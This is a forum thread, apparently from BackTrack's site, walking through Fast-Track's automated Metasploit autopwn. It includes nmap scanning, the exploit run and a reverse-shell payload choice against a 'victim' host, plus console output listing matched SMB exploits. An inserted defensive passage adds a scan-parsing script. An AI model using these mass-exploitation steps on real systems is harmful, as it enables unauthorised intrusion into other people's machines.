BT5_fast-track_automatic_autopwn



zimmaro
07-18-2011, 06:24 AM
hi, guys
my "new" "video" comes from trying to run the automatic_autopwn function in FAST-TRACK. I've had problems with sqlite3 databases (not available in my Metasploit), so I allowed myself to edit the file autopwn.py in the directory /pentest/exploits/fasttrack/bin/ftsrc, inserting the "parameters" of the postgresql database (supported). I know that this video is good for almost nothing! but at least I can use button "2" after ./fast-track.py -i :)
Sorry for my English! Sorry for video quality :)
if you want to see: http://vimeo.com/26552328

I attach my file autopwn.py (for the configuration of postgresql in BT5 follow the tutorials in the forum)! many thanks bye!

tempuser
07-28-2011, 06:17 PM
Hey cool video, love the commentary haha
Cool pic too =D

zimmaro
08-05-2011, 07:37 AM
hi guys,
with msf 4.0.... the command db_workspace "doesn't work" but should be replaced with just msf>workspace -d (delete), msf>workspace -a (add), etc...
bye :)

maxfx
08-05-2011, 11:32 PM
Good video but have to say the best part was the goat lol :)

zimmaro
08-18-2011, 05:07 AM
http://www.backtrack-linux.org/forums/backtrack-5-videos/43117-bt5_fast-track_automatic_autopwn.html

nooh43
08-18-2011, 05:36 AM
Hi ..

please .. if you can write all Terminal Code ..

thank you .. :o

zimmaro
08-21-2011, 09:49 AM
hi
-change your metasploit path in fasttrack_config /pentest/exploits/fasttrack/config [if you have updated & upgraded the metasploit framework]
-download MY_autopwn.py.doc to your desktop
-rename it to autopwn.py
-open autopwn.py (with your text editor [gedit, kate, kwrite, .....])
-correct db_workspace -d to just workspace -d etc. [this is for the new framework version]
-correct db_workspace -a to just workspace -a etc.
-save & REPLACE the ORIGINAL file in /pentest/exploits/fasttrack/bin/ftsrc with this one
-nmap -sP -T4 192.168.1.0/24 (scanning my network with nmap options (nmap --help))
-update-alternatives --config ruby, set "0"
-ruby --version 1.8.7 (for fasttrack to work in my bt5)
-cd /pentest/exploits/fasttrack
-./fast-track.py -i
-2 autopwn automatic
-set the victim ip (result of the nmap scan); my victim is VULNERABLE
-when finished, if you have sessions:
sessions -l (list of open victim sessions)
sessions -i 1 (interact with session number ......)
:)bye..........I seem to have written it all ... or at least I hope! :)

tonytue
08-22-2011, 10:57 AM
..........I seem to have written it all ... or at least I hope! :)

thanks for your contribution :)

ozyblackshark
08-23-2011, 09:38 AM
did you record it and the video format is .ogv? how do you convert it into .avi?
I've tried using ffmpeg and the output is getting worse

zimmaro
08-23-2011, 04:13 PM
hi,
>>>>>apt-get install mencoder
>>>>> mencoder -idx name_of_your_file.ogv -ovc lavc -oac mp3lame -o name_of_your_file.avi
bye!:)

ozyblackshark
08-25-2011, 07:18 AM
@zimmaro:

thanks, I will try it ASAP, but now I need to buy a modem -____-a

hey, where can I contact you if I get another problem?
thanks

zimmaro
09-18-2011, 01:17 PM
hi,
in bt5r1, after updating fast-track (v.4.02) autopwn WORKS AGAIN using the postgresql database!!!!!! now DELETE MY WAY!!
regards :)

zarbam
09-28-2011, 09:39 PM
after remapping all of the programs i realized you attached a modified version:D

xsixsi
10-10-2011, 07:47 PM
Good video I appreciate it thanks for the good share bro,

eastman47
10-16-2011, 08:39 AM
I did everything that was told and now I get these errors


[-] Unknown command: /etc/init.d/postgresql-8.4.
msf > db_driver postgresql
[-] Invalid driver specified
msf > db_connect root:toor@127.0.0.1:5432/metasploit
[-] No database driver has been specified
msf > workspace -d MyProject
[-] Database not connected
msf > workspace -a MyProject
[-] Database not connected
msf > db_nmap -sV -sS -O -T4 85.11.173.163
[-] Database not connected
msf > db_autopwn -p -x -e -R great -r
[-] Database not connected

zimmaro
10-16-2011, 11:45 AM
hi,eastman47,
have you looked at the many replies in this thread? the "tutorial is for bt5"; in bt5 r1 (update&upgrade) the postgresql database works again in the ORIGINAL fast-track! :)

root@bt:~# date
Sun Oct 16 13:38:54 CEST 2011
root@bt:~# uname -r
2.6.39.4
root@bt:~# cd /pentest/exploits/fasttrack
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
[---] [---]
[---] Fast Track: A new beginning [---]
[---] Written by: David Kennedy (ReL1K) [---]
[---] Lead Developer: Joey Furr (j0fer) [---]
[---] Version: 4.0.1 [---]
[---] Homepage: http://www.secmaniac.com [---]
[---] [---]


Fast-Track Main Menu:

1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track

Enter the number: 2
Metasploit Autopwn Automation:

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit
Framework and does not modify the Metasploit Framework in any way. This
is simply to automate some tasks from the autopwn feature already developed
by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254
or 192.168.1.1/24 or whatever you want and it'll run against those hosts.
Additionally you can place NMAP commands within the autopwn ip ranges bar,
for example, if you want to scan even if a host "appears down" just do
-PN 192.168.1.1-254 or whatever...you can use all NMap syntaxes in the
Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i <id> (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the IP ranges to autopwn or (q)uit FastTrack: 192.168.1.253

Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: 2
Launching MSFConsole and prepping autopwn...
db_driver postgresql
db_nmap 192.168.1.253
db_autopwn -p -t -e -r
sleep 5
jobs -K




sessions -l
echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i <id> to jump into a shell"
[Metasploit ASCII-art startup banner, garbled by the forum archive]


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 743 exploits - 382 auxiliary - 88 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13874 updated 5 days ago (2011.10.11)

msf > db_driver postgresql
Using database driver postgresql
msf > db_nmap 192.168.1.253
Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-10-16 13:44 CEST
Nmap: Nmap scan report for ---.homenet.telecomitalia.it (192.168.1.253)
Nmap: Host is up (0.0017s latency).
Nmap: Not shown: 992 filtered ports
Nmap: PORT STATE SERVICE
Nmap: 135/tcp open msrpc
Nmap: 139/tcp open netbios-ssn
Nmap: 445/tcp open microsoft-ds
Nmap: 554/tcp open rtsp
Nmap: 2869/tcp open icslap
Nmap: 5357/tcp open wsdapi
Nmap: 10243/tcp open unknown
Nmap: 49155/tcp open unknown
Nmap: MAC Address: 00:0C:6E:B0:19:30 (Asustek Computer)
Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
msf > db_autopwn -p -t -e -r
[-]
[-] Warning: The db_autopwn command is deprecated and will be removed in a future version.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-]
Analysis completed in 28 seconds (0 vulns / 0 refs)

================================================================================
Matching Exploit Modules
================================================================================
192.168.1.253:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
192.168.1.253:139 exploit/freebsd/samba/trans2open (port match)
192.168.1.253:139 exploit/linux/samba/chain_reply (port match)
192.168.1.253:139 exploit/linux/samba/lsa_transnames_heap (port match)
192.168.1.253:139 exploit/linux/samba/trans2open (port match)
192.168.1.253:139 exploit/multi/samba/nttrans (port match)
192.168.1.253:139 exploit/multi/samba/usermap_script (port match)
192.168.1.253:139 exploit/netware/smb/lsass_cifs (port match)
192.168.1.253:139 exploit/osx/samba/lsa_transnames_heap (port match)
192.168.1.253:139 exploit/solaris/samba/trans2open (port match)
192.168.1.253:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
192.168.1.253:139 exploit/windows/brightstor/etrust_itm_alert (port match)
192.168.1.253:139 exploit/windows/smb/ms03_049_netapi (port match)
192.168.1.253:139 exploit/windows/smb/ms04_011_lsass (port match)
192.168.1.253:139 exploit/windows/smb/ms04_031_netdde (port match)
192.168.1.253:139 exploit/windows/smb/ms05_039_pnp (port match)
192.168.1.253:139 exploit/windows/smb/ms06_040_netapi (port match)
192.168.1.253:139 exploit/windows/smb/ms06_066_nwapi (port match)
192.168.1.253:139 exploit/windows/smb/ms06_066_nwwks (port match)
192.168.1.253:139 exploit/windows/smb/ms06_070_wkssvc (port match)
192.168.1.253:139 exploit/windows/smb/ms07_029_msdns_zonename (port match)
192.168.1.253:139 exploit/windows/smb/ms08_067_netapi (port match)
192.168.1.253:139 exploit/windows/smb/ms10_061_spoolss (port match)
192.168.1.253:139 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
192.168.1.253:139 exploit/windows/smb/psexec (port match)
192.168.1.253:139 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
192.168.1.253:445 exploit/freebsd/samba/trans2open (port match)
192.168.1.253:445 exploit/lin............................................... .................................................. .....
..............happy continuos!!!:)
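A note on reading the output above from the defender's side: the analysis reports "0 vulns", so every line under "Matching Exploit Modules" is a "(port match)", meaning db_autopwn -p simply queued every module whose default port happens to be open (135, 139, 445), not anything it knows the host to be vulnerable to. The actionable information for whoever owns 192.168.1.253 is therefore the open-port inventory from db_nmap. The following is an added example, not code from fast-track, Metasploit, or this thread: it parses the "Nmap:" lines exactly as msfconsole prints them for db_nmap (the sample is copied from the scan above), builds a service inventory, and flags anything outside a constructed allow-list so that unexpected exposure of SMB/DCERPC ports is caught before a tool like this starts hammering them. The BASELINE and NOISY_PORTS values are assumptions for the demonstration.

```python
"""Parse db_nmap console output into a host/service inventory and compare it
against an allow-list.  Added example; not part of fast-track or Metasploit.
The sample below is the thread's scan of 192.168.1.253; BASELINE is constructed."""
import re
from dataclasses import dataclass

# Constructed sample input: the lines as msfconsole prefixes them with "Nmap: ".
SAMPLE_OUTPUT = """\
Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-10-16 13:44 CEST
Nmap: Nmap scan report for ---.homenet.telecomitalia.it (192.168.1.253)
Nmap: Host is up (0.0017s latency).
Nmap: Not shown: 992 filtered ports
Nmap: PORT STATE SERVICE
Nmap: 135/tcp open msrpc
Nmap: 139/tcp open netbios-ssn
Nmap: 445/tcp open microsoft-ds
Nmap: 554/tcp open rtsp
Nmap: 2869/tcp open icslap
Nmap: 5357/tcp open wsdapi
Nmap: 10243/tcp open unknown
Nmap: 49155/tcp open unknown
Nmap: MAC Address: 00:0C:6E:B0:19:30 (Asustek Computer)
Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
"""


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str


# "scan report for 1.2.3.4" or "scan report for hostname (1.2.3.4)"
HOST_RE = re.compile(r"Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?")
# "135/tcp open msrpc" (any amount of whitespace between columns)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_db_nmap(text):
    """Return Service records for every port line, attributed to the host
    named in the most recent 'scan report' line."""
    services = []
    host = None
    for raw in text.splitlines():
        line = raw[len("Nmap: "):] if raw.startswith("Nmap: ") else raw
        m = HOST_RE.search(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            port, proto, state, name = m.groups()
            services.append(Service(host, int(port), proto, state, name))
    return services


# Constructed allow-list: what this host is *expected* to expose.  Anything
# open and not listed here is a finding for the asset owner.
BASELINE = {
    "192.168.1.253": {(554, "tcp"), (2869, "tcp"), (5357, "tcp"), (10243, "tcp")},
}

# Ports that the thread's db_autopwn -p output port-matched against its whole
# SMB/DCERPC module set; exposure of these is what most needs reviewing.
NOISY_PORTS = {135, 139, 445}


def unexpected_services(services, baseline=BASELINE):
    """Open services that are not in the host's allow-list."""
    return [s for s in services
            if s.state == "open"
            and (s.port, s.proto) not in baseline.get(s.host, set())]


def autopwn_exposed_ports(services):
    """Open ports on which a port-matching tool would queue its bulk of modules."""
    return sorted({s.port for s in services
                   if s.state == "open" and s.port in NOISY_PORTS})


if __name__ == "__main__":
    inventory = parse_db_nmap(SAMPLE_OUTPUT)
    for s in inventory:
        print(f"{s.host}:{s.port}/{s.proto} {s.state} {s.name}")
    for s in unexpected_services(inventory):
        print(f"FINDING: {s.host}:{s.port}/{s.proto} ({s.name}) not in baseline")
    print("port-match exposure:", autopwn_exposed_ports(inventory))
```

Run against the sample, the parser yields eight services; 135, 139, 445 and 49155 are reported as outside the baseline, and the three SMB/DCERPC ports are listed as the ones that would attract a port-matched module barrage. Swapping SAMPLE_OUTPUT for the saved console log of a real db_nmap run is the only change needed to use it on your own scans.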

beybala
11-12-2011, 04:05 PM
hi, I updated Metasploit and then I couldn't use autopwn, logs here:

msf > db_autopwn -h
[-] Unknown command: db_autopwn.
msf > help
Database Backend Commands
=========================

Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

what can I do?

zimmaro
11-13-2011, 05:33 PM
hi,beybala:
i'm trying to ask someone more knowledgeable than me:
http://www.backtrack-linux.org/forums/showthread.php?t=46338&p=209968#post209968

tlotr
11-01-2012, 08:47 AM
Hi,

I have tried this. But unfortunately it isn't working for me. I am using backtrack 5 R3 Gnome.

Can any one please help me.

I have a system on the network which is having only port 5357 open wsdapi.

Anyone can help in suggesting an exploit for this port.

Thanks in advance.

zimmaro
11-02-2012, 02:37 AM
Hi,

I have tried this. But unfortunately it isn't working for me. I am using backtrack 5 R3 Gnome.

Can any one please help me.

I have a system on the network which is having only port 5357 open wsdapi.

Anyone can help in suggesting an exploit for this port.

Thanks in advance.

hi :)
the thread was tested for the first versions of BT5; now I could not tell if it works with R3.
I'm not an expert; if your victim is "patched" against the exploits launched by autopwn, with this technique you cannot do anything!
if the scanner shows you port 5357 (WSDAPI) open, do a search for the "specification" of the potential vulnerability and ... try it ..!
or you have to change "the way" of "attack"
bye